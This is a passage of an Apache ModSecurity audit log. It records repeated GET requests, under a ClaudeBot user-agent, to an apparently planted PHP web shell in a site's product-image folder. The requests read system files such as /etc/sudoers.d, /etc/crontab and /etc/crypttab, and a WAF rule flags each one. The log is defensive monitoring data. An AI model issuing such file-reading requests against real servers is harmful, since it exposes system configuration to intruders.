"/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/version found within ARGS:viewfile: /proc/version_signature"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE59jH15LOn2YRwTZIj1lwAAAAc"] Apache-Handler: application/x-httpd-php Stopwatch: 1749974412236046 4848 (- - -) Stopwatch2: 1749974412236046 4848; combined=2347, p1=390, p2=1826, p3=36, p4=37, p5=58, sr=133, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --77980c58-Z-- --b0bc0c53-A-- [15/Jun/2025:13:32:48.299239 +0530] aE5-KLaxs8_oWLL8MgpKVAAAAAY 216.73.216.83 56894 127.0.0.1 7081 --b0bc0c53-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fetc%2Fsudoers.d HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --b0bc0c53-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2602 Connection: close Content-Type: text/html; charset=UTF-8 --b0bc0c53-H-- Message: Warning. Matched phrase "etc/sudoers" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/sudoers found within ARGS:path: /etc/sudoers.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/sudoers" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/sudoers found within ARGS:path: /etc/sudoers.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE5-KLaxs8_oWLL8MgpKVAAAAAY"] Apache-Handler: application/x-httpd-php Stopwatch: 1749974568295609 3684 (- - -) Stopwatch2: 1749974568295609 3684; combined=1904, p1=250, p2=1521, p3=37, p4=23, p5=73, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b0bc0c53-Z-- --7730d57e-A-- [15/Jun/2025:13:33:25.812779 +0530] aE5-Tbaxs8_oWLL8MgpKYQAAAAY 216.73.216.83 44970 127.0.0.1 7081 --7730d57e-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fetc%2Fmodules-load.d HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --7730d57e-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3145 Connection: close Content-Type: text/html; charset=UTF-8 --7730d57e-H-- Message: Warning. Matched phrase "etc/modules" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/modules found within ARGS:path: /etc/modules-load.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/modules" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/modules found within ARGS:path: /etc/modules-load.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE5-Tbaxs8_oWLL8MgpKYQAAAAY"] Apache-Handler: application/x-httpd-php Stopwatch: 1749974605808660 4173 (- - -) Stopwatch2: 1749974605808660 4173; combined=2201, p1=344, p2=1732, p3=41, p4=28, p5=56, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7730d57e-Z-- --6eb26379-A-- [15/Jun/2025:13:34:44.320855 +0530] aE5-nLp3Rl2d9qI7hkJlVAAAAAM 216.73.216.83 51398 127.0.0.1 7081 --6eb26379-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fetc&viewfile=%2F%2Fetc%2Fcrontab HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --6eb26379-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3441 Connection: close Content-Type: text/html; charset=UTF-8 --6eb26379-H-- Message: Warning. Matched phrase "etc/crontab" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/crontab found within ARGS:viewfile: /etc/crontab"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/crontab" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/crontab found within ARGS:viewfile: /etc/crontab"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE5-nLp3Rl2d9qI7hkJlVAAAAAM"] Apache-Handler: application/x-httpd-php Stopwatch: 1749974684316901 4008 (- - -) Stopwatch2: 1749974684316901 4008; combined=1947, p1=304, p2=1519, p3=34, p4=37, p5=53, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6eb26379-Z-- --5ccec46b-A-- [15/Jun/2025:13:36:29.712678 +0530] aE5_BcA9_50UwvnTnaER0QAAAAo 216.73.216.83 38632 127.0.0.1 7081 --5ccec46b-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fetc&viewfile=%2F%2Fetc%2Fhosts.deny HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --5ccec46b-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3334 Connection: close Content-Type: text/html; charset=UTF-8 --5ccec46b-H-- Message: Warning. Matched phrase "etc/hosts" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/hosts found within ARGS:viewfile: /etc/hosts.deny"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/hosts" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/hosts found within ARGS:viewfile: /etc/hosts.deny"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE5_BcA9_50UwvnTnaER0QAAAAo"] Apache-Handler: application/x-httpd-php Stopwatch: 1749974789708776 3962 (- - -) Stopwatch2: 1749974789708776 3962; combined=1977, p1=339, p2=1512, p3=34, p4=34, p5=58, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5ccec46b-Z-- --35c20d11-A-- [15/Jun/2025:13:38:44.194624 +0530] aE5_jE0nW1houYLyuKrIdQAAAA0 216.73.216.83 59572 127.0.0.1 7081 --35c20d11-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fetc&viewfile=%2F%2Fetc%2Fsensors3.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --35c20d11-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4892 Connection: close Content-Type: text/html; charset=UTF-8 --35c20d11-H-- Message: Warning. Matched phrase "etc/sensors3.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/sensors3.conf found within ARGS:viewfile: /etc/sensors3.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/sensors3.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/sensors3.conf found within ARGS:viewfile: /etc/sensors3.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE5_jE0nW1houYLyuKrIdQAAAA0"] Apache-Handler: application/x-httpd-php Stopwatch: 1749974924190450 4247 (- - -) Stopwatch2: 1749974924190450 4247; combined=2071, p1=348, p2=1584, p3=35, p4=33, p5=71, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --35c20d11-Z-- --bc81e564-A-- [15/Jun/2025:13:40:27.473421 +0530] aE5_87axs8_oWLL8MgpLCAAAAAY 216.73.216.83 46006 127.0.0.1 7081 --bc81e564-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc&viewfile=%2F%2Fproc%2Fversion HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --bc81e564-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3065 Connection: close Content-Type: text/html; charset=UTF-8 --bc81e564-H-- Message: Warning. Matched phrase "proc/version" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/version found within ARGS:viewfile: /proc/version"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/version" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/version found within ARGS:viewfile: /proc/version"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE5_87axs8_oWLL8MgpLCAAAAAY"] Apache-Handler: application/x-httpd-php Stopwatch: 1749975027468876 4599 (- - -) Stopwatch2: 1749975027468876 4599; combined=2249, p1=329, p2=1781, p3=46, p4=37, p5=56, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --bc81e564-Z-- --f6231c35-A-- [15/Jun/2025:13:40:27.474104 +0530] aE5_8315LOn2YRwTZIj2pwAAAAc 216.73.216.83 46012 127.0.0.1 7081 --f6231c35-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fetc&viewfile=%2F%2Fetc%2Fdebian_version HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --f6231c35-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2950 Connection: close Content-Type: text/html; charset=UTF-8 --f6231c35-H-- Message: Warning. Matched phrase "etc/debian_version" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/debian_version found within ARGS:viewfile: /etc/debian_version"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/debian_version" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/debian_version found within ARGS:viewfile: /etc/debian_version"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE5_8315LOn2YRwTZIj2pwAAAAc"] Apache-Handler: application/x-httpd-php Stopwatch: 1749975027469410 4754 (- - -) Stopwatch2: 1749975027469410 4754; combined=2401, p1=352, p2=1913, p3=40, p4=40, p5=56, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f6231c35-Z-- --0be7a500-A-- [15/Jun/2025:13:42:36.342747 +0530] aE6AdLaxs8_oWLL8MgpLUAAAAAY 216.73.216.83 33002 127.0.0.1 7081 --0be7a500-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fetc%2Fprofile.d HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --0be7a500-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3633 Connection: close Content-Type: text/html; charset=UTF-8 --0be7a500-H-- Message: Warning. Matched phrase "etc/profile" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:path: /etc/profile.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/profile" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:path: /etc/profile.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6AdLaxs8_oWLL8MgpLUAAAAAY"] Apache-Handler: application/x-httpd-php Stopwatch: 1749975156337912 4888 (- - -) Stopwatch2: 1749975156337912 4888; combined=2366, p1=376, p2=1860, p3=42, p4=29, p5=59, sr=111, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0be7a500-Z-- --e1eb6d15-A-- [15/Jun/2025:13:43:29.233742 +0530] aE6AqcZRGs9Zs5Qd_koKBQAAAAA 216.73.216.83 36282 127.0.0.1 7081 --e1eb6d15-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fetc&viewfile=%2F%2Fetc%2Fmodules HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --e1eb6d15-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3044 Connection: close Content-Type: text/html; charset=UTF-8 --e1eb6d15-H-- Message: Warning. Matched phrase "etc/modules" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/modules found within ARGS:viewfile: /etc/modules"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/modules" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/modules found within ARGS:viewfile: /etc/modules"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6AqcZRGs9Zs5Qd_koKBQAAAAA"] Apache-Handler: application/x-httpd-php Stopwatch: 1749975209229065 4738 (- - -) Stopwatch2: 1749975209229065 4738; combined=2430, p1=366, p2=1920, p3=39, p4=39, p5=66, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e1eb6d15-Z-- --939f733d-A-- [15/Jun/2025:13:43:29.413641 +0530] aE6AqTLduUtIJgHLZtvImgAAAAE 216.73.216.83 57724 127.0.0.1 7081 --939f733d-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fetc&viewfile=%2F%2Fetc%2Fcrypttab HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --939f733d-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2976 Connection: close Content-Type: text/html; charset=UTF-8 --939f733d-H-- Message: Warning. Matched phrase "etc/crypttab" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/crypttab found within ARGS:viewfile: /etc/crypttab"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/crypttab" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/crypttab found within ARGS:viewfile: /etc/crypttab"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6AqTLduUtIJgHLZtvImgAAAAE"] Apache-Handler: application/x-httpd-php Stopwatch: 1749975209409497 4197 (- - -) Stopwatch2: 1749975209409497 4197; combined=2266, p1=330, p2=1813, p3=36, p4=35, p5=52, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --939f733d-Z-- --3877ca78-A-- [15/Jun/2025:13:43:30.050141 +0530] aE6AqrIQi_ruyWEJ7bFHfgAAAAk 216.73.216.83 57824 127.0.0.1 7081 --3877ca78-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fetc&viewfile=%2F%2Fetc%2Fca-certificates.conf.dpkg-old HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --3877ca78-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4506 Connection: close Content-Type: text/html; charset=UTF-8 --3877ca78-H-- Message: Warning. Matched phrase "etc/ca-certificates.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/ca-certificates.conf found within ARGS:viewfile: /etc/ca-certificates.conf.dpkg-old"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/ca-certificates.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/ca-certificates.conf found within ARGS:viewfile: /etc/ca-certificates.conf.dpkg-old"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6AqrIQi_ruyWEJ7bFHfgAAAAk"] Apache-Handler: application/x-httpd-php Stopwatch: 1749975210045920 4275 (- - -) Stopwatch2: 1749975210045920 4275; combined=2022, p1=331, p2=1573, p3=32, p4=34, p5=52, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3877ca78-Z-- --7dc03b6c-A-- [15/Jun/2025:13:45:43.301224 +0530] aE6BL315LOn2YRwTZIj3NgAAAAc 216.73.216.83 60798 127.0.0.1 7081 --7dc03b6c-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fetc&viewfile=%2F%2Fetc%2Fftpusers HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --7dc03b6c-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3036 Connection: close Content-Type: text/html; charset=UTF-8 --7dc03b6c-H-- Message: Warning. Matched phrase "etc/ftpusers" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/ftpusers found within ARGS:viewfile: /etc/ftpusers"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/ftpusers" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/ftpusers found within ARGS:viewfile: /etc/ftpusers"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6BL315LOn2YRwTZIj3NgAAAAc"] Apache-Handler: application/x-httpd-php Stopwatch: 1749975343296908 4384 (- - -) Stopwatch2: 1749975343296908 4384; combined=2309, p1=399, p2=1777, p3=37, p4=36, p5=60, sr=143, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7dc03b6c-Z-- --c53d2d3a-A-- [15/Jun/2025:13:45:44.396876 +0530] aE6BMPVbLd3MzwkmrE-JoQAAAAg 216.73.216.83 60920 127.0.0.1 7081 --c53d2d3a-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fetc&viewfile=%2F%2Fetc%2Fresolv.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --c53d2d3a-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3389 Connection: close Content-Type: text/html; charset=UTF-8 --c53d2d3a-H-- Message: Warning. Matched phrase "etc/resolv.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/resolv.conf found within ARGS:viewfile: /etc/resolv.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/resolv.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/resolv.conf found within ARGS:viewfile: /etc/resolv.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6BMPVbLd3MzwkmrE-JoQAAAAg"] Apache-Handler: application/x-httpd-php Stopwatch: 1749975344392645 4285 (- - -) Stopwatch2: 1749975344392645 4285; combined=2279, p1=339, p2=1812, p3=38, p4=37, p5=53, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c53d2d3a-Z-- --7d699d6d-A-- [15/Jun/2025:13:45:44.669017 +0530] aE6BMLIQi_ruyWEJ7bFHuQAAAAk 216.73.216.83 60958 127.0.0.1 7081 --7d699d6d-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fetc&viewfile=%2F%2Fetc%2Faliases.db 